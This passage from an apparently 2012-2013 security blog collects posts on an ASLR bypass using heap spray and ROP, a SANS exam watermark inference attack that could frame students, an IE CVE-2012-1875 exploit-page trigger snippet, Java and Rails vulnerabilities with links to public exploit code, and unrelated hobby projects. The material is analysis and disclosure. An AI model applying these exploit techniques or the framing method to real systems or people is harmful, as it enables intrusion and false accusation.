Now that the selected DLL (The Windows Media Player DLLs, to continue the example) are loaded into a predictable address, execution of shellcode is only an ROP chain away! I won't spoil the rest of the example Kingcope provided [Hint: <a href="http://msdn.microsoft.com/en-us/library/windows/desktop/ms684175(v=vs.85).aspx">LoadLibrary</a> API], but suffice to say it is relatively simple to construct an ROP chain by which to execute arbitrary code following a heap spray.<br />
<br />
Click the link to view a quick graphic summary.<br />
<br />
<a name='more'></a><br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgS5SpuluC-cr18rbdskFF6pVO58zqDpiYYwttByOlSaTvvFiHPpPskAaLql91FO1mDnE6fUFYHLO5-96oWM0oYoluaOqVgAG8GnPO82hb0t_9VzvofK-RBN77R3sYj0KukKjz82FaRaE-6/s1600/ASLRBypass.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img alt="" border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgS5SpuluC-cr18rbdskFF6pVO58zqDpiYYwttByOlSaTvvFiHPpPskAaLql91FO1mDnE6fUFYHLO5-96oWM0oYoluaOqVgAG8GnPO82hb0t_9VzvofK-RBN77R3sYj0KukKjz82FaRaE-6/s1600/ASLRBypass.jpg" title="Quick Graphic Breakdown of Kingcope's Proposal" /></a></div>
<br />
*Perhaps not so much in the case of Java.<br />
**One drawback to this proposed technique is that filling memory in this way will cause Windows to become unresponsive until the selected DLL is loaded and memory is freed by an attacker's JavaScript.</div>
Anonymoushttp://www.blogger.com/profile/07700158074972140726noreply@blogger.com0tag:blogger.com,1999:blog-5498034097070054412.post-62655395708832372882013-01-24T11:34:00.003-08:002013-01-24T11:35:33.626-08:00My GCIA Gold paper was published on sans.org. Also, SANS watermarksI completed my GCIA Gold paper and it was accepted and published this past week. Link below:<br />
<br />
<a href="http://www.sans.org/reading_room/whitepapers/detection/watermarks-prevent-leaks_34087">http://www.sans.org/reading_room/whitepapers/detection/watermarks-prevent-leaks_34087</a><br />
<br />
I wrote it on watermarks and it took me the larger half of the past year to complete. Boy I really underestimated how difficult it would be. When I read other people's papers I saw a lot of poor grammar and spelling so I didn't take it very seriously and figured I could just knock it out in a leisurely few months. I couldn't be more wrong. I spent well over a hundred hours on it, and almost all of the original draft got scrapped. If you're considering a "gold" level paper for any of the GIAC certifications, be aware it isn't going to be easy. But when you get it, it's good resume fodder.<br />
<br />
I picked the topic of the paper due to the watermarks I noticed on the GCIA practice tests I was taking. Below are details about SANS watermarks, simply because they were dropped from the paper. The information was passed along to SANS many months ago so they can act on it if they wanted. None of this could be exploited in a profitable way, but I found it interesting.<br />
<br />
If you look at the monitor at an angle while taking a SANS practice test you can see the watermarks. On further inspection you may notice it's the exact same number as the exam ID. You might also notice that the exam ID numbers you get if you purchase multiple tests are sequential. I collected dozens of numbers from other users and found that this incrementing number is sequential for all users. You could spawn practice "math tests" to ensure the software worked, and those numbers were also sequential from the same autoincrementing field in their database. This indicates an inference attack is possible. <br />
<br />
Now the purpose of the watermark is most undoubtedly to trace the source of copyright infringement. The number is unique on a per-test basis and if the test questions were found on p2p networks and the watermark number was carried over, it could be used as evidence against the student that number pointed to. Since SANS testing costs as about much as a used car, they probably care more about piracy than the average cert vendor.<br />
<br />
The problem is that the watermark number is semi-predictable and easily altered. It isn't apparent that your exam ID is sensitive information and could be used against you as evidence, and I didn't realize it myself when I was asking people for theirs. If you wanted to frame someone for piracy, it's as simple as asking them for their practice exam ID.<br />
<br />
Since the IDs are sequential, you could also spawn many math tests and infer someone else's exam ID numbers when they purchase one. example:<br />
<br />
Exam ID - description<br />
1 - my math test<br />
2 - my math test<br />
3 - my math test<br />
4 - Other person's practice test<br />
5 - Other person's practice test<br />
6 - Other person's exam<br />
7 - my math test<br />
8 - my math test<br />
<br />
On my account I would notice a gap between 4 and 7 in my math test IDs and I would know that someone purchased a set of three tests(which is how it goes when they buy the full training, afaik) and #4 and #5 are the practice tests. Then if I was an awful person I could insert a "4" watermark and release the test question into the wild. This is a very hit or miss way of framing someone because their practice test is most likely for a different certification than your test question and you can't tell.<br />
<br />
Aside from that, one could also infer purchasing statistics from this autoincrement field. By spawning math tests over time, one could infer how many tests are purchased by observing how many exam IDs were generated by other people. clusters of 3 are most likely full training purchases, and 1 indicates a single test purchase or a math test. The math test function is rather obscure on their website and I think it's fair to say that it's rarely used. SANS doesn't release any information(afaik) about how many tests or trainings are purchased- only how many students pass. This information isn't very profitable but it is not public either.<br />
<br />
Now with all of that said, the real core of this weakness is that they're using their autoincrement field for something important. It's a convenient field to use because you know it'll be unique and it's always going to be an index and easily searchable. But it will always be weak to inference attacks, and that class of attacks is very hard to protect against because most of the time it isn't obvious what you could discover with that data. <br />
<br />
This attack was inspired by an inference attack I found/reported against a video game years ago. The account ID was autoincremented and easily obtainable so I could infer secret data like account age and some overall userbase statistics. In the context of that game it was useful for cheating, so beware of using that field.<br />
<br />
And if you ever plan to do evil stuff with this knowledge, <a href="http://www.youtube.com/watch?v=Zx40udwQvZI" target="_blank">this</a> is all i have to say to you. Spawning tons of math tests on sans exam portal will get you noticed.Allison Nixonhttp://www.blogger.com/profile/07417179802217468668noreply@blogger.com0tag:blogger.com,1999:blog-5498034097070054412.post-64967783829552266332013-01-16T10:07:00.000-08:002013-01-16T10:12:24.083-08:00JavaScript Anti-Automated Detection<div dir="ltr" style="text-align: left;" trbidi="on">
<br />
Yesterday, I came across a relatively rudimentary webpage attempting to exploit a vulnerability in Microsoft Internet Explorer. The particular vulnerability in question is defined in CVE-2012-1875 and is identified by Microsoft in MS12-037. Excellent coverage of this exploit in the wild was posted by AlienVault Labs <a href="http://labs.alienvault.com/labs/index.php/2012/ongoing-attacks-exploiting-cve-2012-1875/">http://labs.alienvault.com/labs/index.php/2012/ongoing-attacks-exploiting-cve-2012-1875/</a><br />
<br />
Though hardly cutting edge now (a fix was issued in June of 2012), I was curious about one of the sections of code. Following the ROP techniques used to bypass Windows Vista (And later) DEP [Data Execution Prevention], there is a section of code, a "Trigger" that looks like the following [Code follows the Break]:<br />
<br />
<br />
<a name='more'></a><br />
<br />
<blockquote class="tr_bq">
<span style="background-color: black;"><span style="color: orange;"><DIV id=testfaild><br /><span class="Apple-tab-span" style="white-space: pre;"> </span><img id="imgTest" style="display:none"><br /><span class="Apple-tab-span" style="white-space: pre;"> </span><a href="javascript:OnTest();" id="MyA" onClick="OnTest();"><br /><span class="Apple-tab-span" style="white-space: pre;"> </span><div style="background-color:#FFFFFF; width:3000; height:4000" id="imgTest" src="" onMouseOver="OnTest2();" onMouseOut="OnTest2();"> </div><br /><span class="Apple-tab-span" style="white-space: pre;"> </span></a><br /><span class="Apple-tab-span" style="white-space: pre;"> </span></DIV></span></span></blockquote>
<span class="Apple-tab-span" style="white-space: pre;"> </span><br />
<br />
Ok, so what is actually going on here? It appears that some user action is required to trigger this exploit. Fortunately for the exploit writers, a user who was redirected to an attack page will probably perform one of the following triggers:<br />
<br />
1) Click their mouse<br />
2) Move their mouse<br />
<br />
Looking at the div parameters (3000x4000), the malicious page will detect any of the above triggers anywhere on the screen. This brings me to an interesting point: automated analysis, unless previously scripted, doesn't typically manipulate a mouse (or utilize a GUI in any form). Pretty interesting way to dodge automated detection based on pulling the page (curl or wget). In 2012, the trend of aiming to defeat automated analysis certainly grew in the world of malware. Seeing it in the attack pages shouldn't be unexpected.<br />
<br />
One thing is for sure: 2013 is going to be interesting.<br />
<br />
<br />
Edit:<br />
Since its public, the full exploit code can be found here:<br />
<a href="http://pastebin.com/sFqxs4qx">http://pastebin.com/sFqxs4qx</a><br />
<br />
The Metasploit Module (Released June 14, 2012) is available here:<br />
<a href="http://www.exploit-db.com/exploits/19141/">http://www.exploit-db.com/exploits/19141/</a><br />
<br />
<br /></div>
Anonymoushttp://www.blogger.com/profile/07700158074972140726noreply@blogger.com0tag:blogger.com,1999:blog-5498034097070054412.post-49939147381855831902013-01-15T19:20:00.000-08:002013-01-15T19:46:22.769-08:00Update on CVE-2013-0422, The Aftermath<div dir="ltr" style="text-align: left;" trbidi="on">
Oracle has officially released Java 7 update 11 which addresses one of two vulnerabilities highlighted in CVE-2013-0422.<br />
<br />
The reflective (invoke) API vulnerability (introduced in Java 7) has been patched, and it has come to light from posts to the Full Disclosure mailing list that this particular vulnerability was introduced due to an earlier, incomplete patch.<br />
Full write up here: <a href="http://lists.grok.org.uk/pipermail/full-disclosure/2013-January/089375.html">More details on Issue 32 and Oracle's 'fix' for it</a><br />
<br />
The initial confounding information released by Immunity Inc stating that JRE6 could be effected by the "com.sun.jmx.mbeanserver.MBeanInstantiator.findClass" has been refuted by the very same firm after further analysis. This leads to 3rd party substantiation of Oracle's claim that only JDK and JRE 7 update 10 and earlier are affected.<br />
A summary of Immunity Inc's findings:<br />
<blockquote class="tr_bq">
<span style="-webkit-text-size-adjust: none; background-color: #141414; color: white; font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif; font-size: 16px; line-height: 20px;">After further research we found that </span><b style="-webkit-text-size-adjust: none; background-color: #141414; color: white; font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif; font-size: 16px; line-height: 20px;">although the<i>MBeanInstantiator</i> code is the same in both versions, JDK/JRE 6 cannot be exploited.</b></blockquote>
Original analysis [Warning, PDF!]: <a href="https://partners.immunityinc.com/idocs/Java%20MBeanInstantiator.findClass%200day%20Analysis.pdf">https://partners.immunityinc.com/idocs/Java%20MBeanInstantiator.findClass%200day%20Analysis.pdf</a><br />
Post Patch Analysis: <a href="http://immunityproducts.blogspot.com.ar/2013/01/confirmed-java-only-fixed-one-of-two.html?m=1">http://immunityproducts.blogspot.com.ar/2013/01/confirmed-java-only-fixed-one-of-two.html?m=1</a><br />
<br />
Patching the reflective API vulnerability cuts off the vehicle for exploitation of the MBeanInstantiator.findClass vulnerability. However, Immunity Inc indicates that restricted classes can still be called. This calls into question the overall security of the trusted class model utilized my Java 7. It remains to be seen if another vehicle for exploitation will be found, and if so, how soon it will be utilized.<br />
<br />
Oracle's official Security Alert can be found here: <a href="http://www.oracle.com/technetwork/topics/security/alert-cve-2013-0422-1896849.html">http://www.oracle.com/technetwork/topics/security/alert-cve-2013-0422-1896849.html</a><br />
<br />
Two big takeaways here:<br />
1) JDK and JRE 6, 5.0 and 1.4.2, and Java SE Embedded JRE releases are not affected.<br />
2) The MBeanInstantiator.findClass vulnerability is still present, but currently there are no known alternative methods to utilize this bug.</div>
Anonymoushttp://www.blogger.com/profile/07700158074972140726noreply@blogger.com1tag:blogger.com,1999:blog-5498034097070054412.post-60171351209777829962013-01-11T14:02:00.000-08:002013-01-15T19:46:22.771-08:00Off the Rails: A blurb about CVE 2013-0156<div dir="ltr" style="text-align: left;" trbidi="on">
Its been quite a January so far, and we aren't even half way through!<br />
<br />
Earlier this week (Prior to the January 10th, 2013 Java 0day), another major remote code execution vulnerability was disclosed which effects Ruby on Rails implementations 2.x and 3.x.<br />
Summary Here: <a href="http://threatpost.com/en_us/blogs/exploit-code-metasploit-module-out-ruby-rails-flaws-011013">http://threatpost.com</a><br />
<br />
So far, a Metasploit module and POC exploit code have been released. The SQL injection vulnerability is nicely summarized here:<br />
<span style="background-color: #741b47;">!ruby/object:Arel::Nodes::SqlLiteral </span><br />
<br />
A trio of vulnerabilities exist, JSON, XML [Parsing], and Remote Code Execution. For more information see the link here: <a href="http://ronin-ruby.github.com/blog/2013/01/09/rails-pocs.html">http://ronin-ruby.github.com/blog</a>. The root of these vulnerabilities lies in the way in which Rails parses YAML input (user-controlled).<br />
<br />
<br />
If you want an in depth break down of the functionality of the RoR vulnerability:<br />
<a href="http://www.insinuator.net/2013/01/rails-yaml/">http://www.insinuator.net/2013/01/rails-yaml/</a><br />
<br />
For a tl:dr<br />
1. The XML case calls Hash.from_xml() passing the raw POST body as argument<br />
2. The YAML string “”— !ruby/object:A\nfoo: 1\nbar: 1\n” will create an object instance of class A and set the object attributes @foo and @bar to the value 1. This means that an attacker can create instances of all classes defined in the targeted Rails application.<br />
3. ^^ All basic Ruby classes are included, meaning this vulnerability is quite broad.<br />
4. The YAML parser used by Ruby supports the serialization and deserialization of arbitrary data types. This includes Symbols and also arbitrary Objects.<br />
5. SQLi (in the form of the arel object) is probably only the first of many different ways to exploit this, as it is essentially remote code execution.<br />
6. Validate input. Seriously.<br />
<br />
<b><u>Mitigation</u></b><br />
<b><u><br /></u></b>
Upgrade Rails to one of the following releases: 3.2.11, 3.1.10, 3.0.19 or 2.3.15.</div>
Anonymoushttp://www.blogger.com/profile/07700158074972140726noreply@blogger.com0tag:blogger.com,1999:blog-5498034097070054412.post-2104961675211203282013-01-10T09:22:00.003-08:002013-01-15T19:46:22.767-08:00New Java 0-day - 1.7u10<div dir="ltr" style="text-align: left;" trbidi="on">
<br />
Following 4 months of relative quiet from the Java front, today marks the appearance of the first 0day since CVE-2012-5088, which was patched by Oracle in October.<br />
<br />
Preliminary reports from multiple vendors indicate this exploit shares some characteristics with CVE-2012-5088, according to Trustwave's SpiderLabs:<br />
<blockquote class="tr_bq">
On top of using java.lang.invoke.MethodHandle.InvokeWithArguments() from CVE-2012-5088, the attacker smartly takes advantage of MBeanInstantiator in order to get a reference to a restricted class from a trusted caller (MBeanInstantiator is trusted). [<a href="http://blog.spiderlabs.com/2013/01/first-java-0day-for-the-year-2013.html">http://blog.spiderlabs.com/2013/01/first-java-0day-for-the-year-2013.html</a>]</blockquote>
Alienvault has released a screenshot of the exploit in action against a fully patched version of Java. Their conclusions mirror those of the preliminary findings from Trustwave: <a href="http://labs.alienvault.com/labs/index.php/2013/new-year-new-java-zeroday/">http://labs.alienvault.com/labs/index.php/2013/new-year-new-java-zeroday/</a><br />
<br />
Brian Krebs reports that this exploit has already been included in Pauch's Blackhole and Cool Exploit Kits as well as the Nuclear Exploit Kit. The SANS ISC recommends disabling Java if possible. Fortunately, a feature to disable the browser plugin was conveniently rolled into Java 1.7u10.<br />
<br />
For more information, including ISC's recommendation and primary sources, follow the link here <a href="http://isc.sans.edu/diary/Java+is+still+exploitable+and+is+likely+going+to+remain+so./14899">http://isc.sans.edu/diary/Java+is+still+exploitable+and+is+likely+going+to+remain+so./14899</a><br />
<br />
Update 1: Exploit code has been published here:<a href="http://pastebin.com/raw.php?i=cUG2ayjh"> <span style="white-space: pre-wrap;">http://pastebin.com/raw.php?i=cUG2ayjh</span></a><br />
<br />
Update 2: CVE candidate has been added: CVE-2013-0422. The exploit has also been ported to Metasploit.<br />
<br />
Update 3: Lightly Commented Exploit Code Sample<br />
<br />
<table cellpadding="0" cellspacing="0" class="tr-caption-container" style="float: left; margin-right: 1em; text-align: left;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiUauFLzTqbrybAUJKTHHQcniDyEcVKOxupftDJ5SKDTv9hD3dHAVUIfQ_aFOCPhzdwo7ozZtZIX0FVcrZkT2OyWaFyvV0hk4xj3s3StWtO3xm1Jxr2QHNQQ7qEGPDrcMrWY2u9GZRL7qAk/s1600/image001.png" imageanchor="1" style="clear: left; margin-bottom: 1em; margin-left: auto; margin-right: auto;"><img alt="" border="0" height="217" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiUauFLzTqbrybAUJKTHHQcniDyEcVKOxupftDJ5SKDTv9hD3dHAVUIfQ_aFOCPhzdwo7ozZtZIX0FVcrZkT2OyWaFyvV0hk4xj3s3StWtO3xm1Jxr2QHNQQ7qEGPDrcMrWY2u9GZRL7qAk/s400/image001.png" title="Commented Exploit Code Sample" width="400" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Click to Embiggen</td></tr>
</tbody></table>
<br />
<br /></div>
Anonymoushttp://www.blogger.com/profile/07700158074972140726noreply@blogger.com0tag:blogger.com,1999:blog-5498034097070054412.post-31915602716994151292012-12-25T15:41:00.002-08:002012-12-25T15:51:42.192-08:00Python script used to list out all possible bitflipped domainsHere's the script I used about a year ago to generate every bit flip variant of a domain. It enabled me to find this domain and some others. After you generate the list, dump it into Namecheap's bulk domain checker page. It allows you to check up to 50 domains per page load, which is pretty nifty.<br />
<br />
<a href="http://micrmsoft.com/puzzlerchallengeh4u3t4enjr8gr94/bitflip.py">http://micrmsoft.com/puzzlerchallengeh4u3t4enjr8gr94/bitflip.py</a>Allison Nixonhttp://www.blogger.com/profile/07417179802217468668noreply@blogger.com0tag:blogger.com,1999:blog-5498034097070054412.post-42183037350813640842012-12-08T03:36:00.001-08:002012-12-25T15:01:10.455-08:00Our laser maze from the BrainTank conference<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEggwixQE7PTXbcTObkZrKnkWrhsFC2xm9Z_G0Ktj4zLnGGpXgt0awMkrUvTAVqjE_YOwv0vocLoOIS9hFqk4_DT7tKMPjUw4DunPhPWXg-Ad622_c6vXOicKrj4RB6jbQK7Mp8gb7xjSRyX/s1600/lasermaze+article.jpg" target="_blank"><img border="0" height="200" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEggwixQE7PTXbcTObkZrKnkWrhsFC2xm9Z_G0Ktj4zLnGGpXgt0awMkrUvTAVqjE_YOwv0vocLoOIS9hFqk4_DT7tKMPjUw4DunPhPWXg-Ad622_c6vXOicKrj4RB6jbQK7Mp8gb7xjSRyX/s200/lasermaze+article.jpg" width="100" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">One important detail the<br />
journalist left out: Every<br />
time someone fails, our laser<br />
maze hurls insults at the <br />
unfortunate loser. <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEggwixQE7PTXbcTObkZrKnkWrhsFC2xm9Z_G0Ktj4zLnGGpXgt0awMkrUvTAVqjE_YOwv0vocLoOIS9hFqk4_DT7tKMPjUw4DunPhPWXg-Ad622_c6vXOicKrj4RB6jbQK7Mp8gb7xjSRyX/s1600/lasermaze+article.jpg" target="_blank">Click<br />here to see full size.</a></td><td class="tr-caption" style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEggwixQE7PTXbcTObkZrKnkWrhsFC2xm9Z_G0Ktj4zLnGGpXgt0awMkrUvTAVqjE_YOwv0vocLoOIS9hFqk4_DT7tKMPjUw4DunPhPWXg-Ad622_c6vXOicKrj4RB6jbQK7Mp8gb7xjSRyX/s1600/lasermaze+article.jpg" target="_blank"><br /></a></td><td class="tr-caption" style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEggwixQE7PTXbcTObkZrKnkWrhsFC2xm9Z_G0Ktj4zLnGGpXgt0awMkrUvTAVqjE_YOwv0vocLoOIS9hFqk4_DT7tKMPjUw4DunPhPWXg-Ad622_c6vXOicKrj4RB6jbQK7Mp8gb7xjSRyX/s1600/lasermaze+article.jpg" target="_blank"><br /></a></td><td class="tr-caption" style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEggwixQE7PTXbcTObkZrKnkWrhsFC2xm9Z_G0Ktj4zLnGGpXgt0awMkrUvTAVqjE_YOwv0vocLoOIS9hFqk4_DT7tKMPjUw4DunPhPWXg-Ad622_c6vXOicKrj4RB6jbQK7Mp8gb7xjSRyX/s1600/lasermaze+article.jpg" target="_blank"><br /></a></td><td class="tr-caption" style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEggwixQE7PTXbcTObkZrKnkWrhsFC2xm9Z_G0Ktj4zLnGGpXgt0awMkrUvTAVqjE_YOwv0vocLoOIS9hFqk4_DT7tKMPjUw4DunPhPWXg-Ad622_c6vXOicKrj4RB6jbQK7Mp8gb7xjSRyX/s1600/lasermaze+article.jpg" target="_blank"><br /></a></td><td class="tr-caption" style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEggwixQE7PTXbcTObkZrKnkWrhsFC2xm9Z_G0Ktj4zLnGGpXgt0awMkrUvTAVqjE_YOwv0vocLoOIS9hFqk4_DT7tKMPjUw4DunPhPWXg-Ad622_c6vXOicKrj4RB6jbQK7Mp8gb7xjSRyX/s1600/lasermaze+article.jpg" target="_blank"><br /></a></td><td class="tr-caption" style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEggwixQE7PTXbcTObkZrKnkWrhsFC2xm9Z_G0Ktj4zLnGGpXgt0awMkrUvTAVqjE_YOwv0vocLoOIS9hFqk4_DT7tKMPjUw4DunPhPWXg-Ad622_c6vXOicKrj4RB6jbQK7Mp8gb7xjSRyX/s1600/lasermaze+article.jpg" target="_blank"><br /></a></td><td class="tr-caption" style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEggwixQE7PTXbcTObkZrKnkWrhsFC2xm9Z_G0Ktj4zLnGGpXgt0awMkrUvTAVqjE_YOwv0vocLoOIS9hFqk4_DT7tKMPjUw4DunPhPWXg-Ad622_c6vXOicKrj4RB6jbQK7Mp8gb7xjSRyX/s1600/lasermaze+article.jpg" target="_blank"><br /></a></td></tr>
</tbody></table>
<br />
Here's a news article from the Sept 15th, 2012 BrainTank mini-conference we had in Providence. My involvement with it was the construction of the laser maze. The initial design of the challenge was done by me and my friend Megan. She owned the physical design, I owned the design of the electronics and programming. There was a lot of crossover as we helped each other through many design challenges. We also had huge amounts of help from friends on the day of deployment. The project was a huge success and I am very proud of myself and everyone who contributed. Next year I hope to build an even better version.<br />
<br />
I spent several months beforehand sourcing all the parts I could.<br />
-5mW 650nm lasers(count:100)<br />
-650nm photoresistors(count:70)<br />
-2xAA battery holders with batteries(count:100)<br />
-All the scrap CAT5 and CAT4 cable I could find<br />
-Arduino Mega and assorted resistors <br />
<br />
It was a challenge finding the correct part when all the information I had on it was a sheet of specifications and a single photo of the object. On top of that, I didn't know much about electronics. I was going to learn with this project. I had to be careful with my purchases because even though I was buying "samples", I couldn't get any of these companies to deal with me for less than 100$. I checked, rechecked, and sent off the Western Union money. A few weeks later, I get a big box in the mail. LASERS : 100 PIECES<br />
<br />
Now we're in business!<br />
<br />
<a name='more'></a><br />
<br />
I spent over a month testing every possible arrangement of electronics. I had to build a single laser tripwire, and once I got that right, I could make many more and arrange them into an obstacle course. The entire concept of the thing relies on the behavior of the photoresistor. When light hits it, its resistance drops to almost nothing. When light is absent, its resistance skyrockets. Arduino boards are capable of measuring varying levels of resistance, and the Arduino Mega has 16 ports capable of this. If a single laser beam is broken, the contestant fails the challenge. I found that I could chain three photoresistors on a single circuit, so I could have up to 48 laser beams monitored by a single Arduino Mega board. I tore up a lot of CAT5 and CAT4 cabling for this. Computer cabling was a great choice because it is already designed to transfer electricity, and everyone I knew had scrap cable.<br />
<br />
The circuit design was very simple.<br />
<br />
+5V - photoresistor - photoresistor - photoresistor - Arduino receiver - 220O resistor - ground <br />
<br />
Multiply this many times, and you've got one piece of the laser maze.<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhleANVFoFTkS3hWcKn7IoR2Vqhh9LstFl3c-JxBIjigU4ocAKq8eIV5X_YyDHLant41bIGFUpq09B95R8apU798nmZLbcOxVmwqF7pJtUHSqs0UWkx1uAh1CwPNje0nYWzdg5q2SUA4Eq-/s1600/191462_10151211505451609_1218423583_o.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="200" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhleANVFoFTkS3hWcKn7IoR2Vqhh9LstFl3c-JxBIjigU4ocAKq8eIV5X_YyDHLant41bIGFUpq09B95R8apU798nmZLbcOxVmwqF7pJtUHSqs0UWkx1uAh1CwPNje0nYWzdg5q2SUA4Eq-/s200/191462_10151211505451609_1218423583_o.jpg" width="149" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Click to Enlarge</td></tr>
</tbody></table>
The programming was another matter. While the Arduino could now receive signals indicating its state, it wouldn't have known what each level of voltage means. And even if the code running on the Arduino was perfect, there was no way to communicate to anyone that they broke a beam and lost.<br />
<br />
I ended up using the Arduino IDE to control the Arduino board itself, and I used a language called Processing to allow my laptop to interface with the Arduino's serial input. Since I had never written Java syntax before, I had to pick that up too.<br />
<br />
To get the information from the laser to the laptop, I settled on a simple design. The USB link was seriously limited in communications bandwidth, so I made the Arduino only report information when absolutely necessary. The only things transmitted over the link was a RESET command, and a FAIL response. At 9600 baud, transmitting much text was difficult- but with this communication model, all I had to transmit was a single bit.<br />
<br />
When a RESET command was sent from my laptop, the Arduino began monitoring every input for failure. If the voltage of any input fell below a hardcoded baseline(determined by the ambient light in the room, defects in the materials, and many other things), then the Arduino would communicate back a FAIL to my laptop. Upon receiving that event, Processing would load a couple sound files. A siren followed by a randomly chosen insult from some of the most famous and devastatingly witty movies of our time. My computer would then use loudspeakers to publicly shame our now crestfallen participant.<br />
<br />
Huge props go to Brandon for his masterful audio work, debugging work without which we would
not have had a functional program, and his indispensable work on deployment day.<br />
<br />
The laser maze even had a GUI! I borrowed some code from a GUI tutorial to make a clickable rectangle. The rectangle would turn from grey to black to indicate the maze is in a failure state, and turns back and sends a RESET command when you clicked on it. Needless to say, the code was not elegant or pretty in any sense of the word, but since I took on this project precisely because I didn't know this stuff, "barely working" is a coup.<br />
<br />
And all of this only touches on some of the electronic challenges we had to overcome. The laser maze also had a physical component, and we had to settle on the design while overcoming the fact that we were cost limited, had to deploy it within a couple of hours, and had to comply with fire codes. Needless to say, we made and discarded many ideas before settling on the final design. Without Megan's expertise in building prototypes this would not have happened. We used towers made of PVC pipe and an aesthetic inspired by Tron.<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhCxDrL6h9NtN-B_CVAKs1VhTDuVdEkOexuAFvprA47FF-FBp4Cba4s0iGh_S3kvJIAnUyTApwtg56002-kp0fI_T_6TpJ8MDyN2c4-76c7vFXoJg250slgEfLuJUkT0Rc_QheFAhpWuDgC/s1600/202729_3673539792869_1159056807_o.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="150" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhCxDrL6h9NtN-B_CVAKs1VhTDuVdEkOexuAFvprA47FF-FBp4Cba4s0iGh_S3kvJIAnUyTApwtg56002-kp0fI_T_6TpJ8MDyN2c4-76c7vFXoJg250slgEfLuJUkT0Rc_QheFAhpWuDgC/s200/202729_3673539792869_1159056807_o.jpg" width="200" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Prototype towers. <br />
We kept the tower shape<br />
but rejected the mirrors</td></tr>
</tbody></table>
<br />
The week before the event, we wove electronics through all the towers and built as much as we could before the event. The worst case scenario was if something broke the day of and we couldn't fix it. We tried to make our electronics fail in every possible way just so they wouldn't fail on the day of the event. We smashed, burned, stomped on, and electrocuted quite a few of our components. Losing a connection would have been a nightmare so we made everything as robust as we could.<br />
<br />
Early in the morning on the day of, we started setting everything up. We had over a dozen people helping out- fetching things, soldering, wiring, testing, adjusting. One-by-one, we plugged in a sensor, aimed a laser, and manually modified the Arduino program to display its state. Rinse, repeat. By the end of it, we had a mess of torn up twisted-pair sticking out of a breadboard, tamed only by massive amounts of duct tape. Fragile, sketchy, and completely functional. I asked for a final adjustment of the ambient light. I asked everyone to get in and block a laser. Baseline established. Debugging functions disabled. Sirens enabled. I asked everyone to step aside, sent the RESET command. Ready for the first victim.<br />
<br />
We set up a golden statue and challenged people to get through the lasers, steal it, and sneak out undetected, armed with only a spray canister to see the laser beams with. It was an hour before someone managed to get through successfully. From there, we started having time trials to see who could get through the fastest. The best time was 8 seconds. After some time trials, people started hacking our laser maze.<br />
<br />
Aside from being fragile and having obvious gaps in the beams, our physical security barrier had a security flaw- the sensors didn't care where the laser was coming from. It only gave an ON or OFF state. If a potential attacker was armed with their own laser, they could point it at a sensor, and if they broke the original laser beam the sensor wouldn't be able to detect it. This is what they were doing in the newspaper article.<br />
<br />
It also had a weakness where the Arduino hardware could only sample the sensor state so quickly. If someone broke the laser beam and withdrew from it very fast, they would not be detected. We had several people try to run very fast through it but nobody succeeded in running fast enough. You could wave your hand through it, though.<br />
<br />
Overall, the day was a massive success. We had some downtime when things would break, but with the persistence of our volunteers, we were able to get things up and running quickly again. Once I get all the code together I will release it. <br />
<br />
EDIT: Here is the source code for the laser maze. Bonus 47 mp3 clips of insults inside<br />
http://micrmsoft.com/puzzlerchallengeh4u3t4enjr8gr94/final_lasermaze.zipAllison Nixonhttp://www.blogger.com/profile/07417179802217468668noreply@blogger.com0tag:blogger.com,1999:blog-5498034097070054412.post-339090792750623082012-12-05T07:08:00.000-08:002012-12-08T04:02:32.497-08:00Releasing the source code of my puzzlerA couple months ago I released a puzzler on the PaulDotCom podcast and challenged people to complete it. I designed it to be devious and to foil all automated script kiddie scanners while still being vulnerable. Today, I got around to putting the source code together in a package so you could run it yourself, or look at the source code if you want to use parts of the challenge to your own ends. I impose no license restrictions on it. Do with it as you wish and use at your own risk.<br />
<br />
The file is located here:<br />
<a href="http://micrmsoft.com/puzzlerchallengeh4u3t4enjr8gr94/package.zip">http://micrmsoft.com/puzzlerchallengeh4u3t4enjr8gr94/package.zip</a><br />
<br />
Here is a copy of the readme file with instructions:<br />
<br />
<blockquote class="tr_bq">
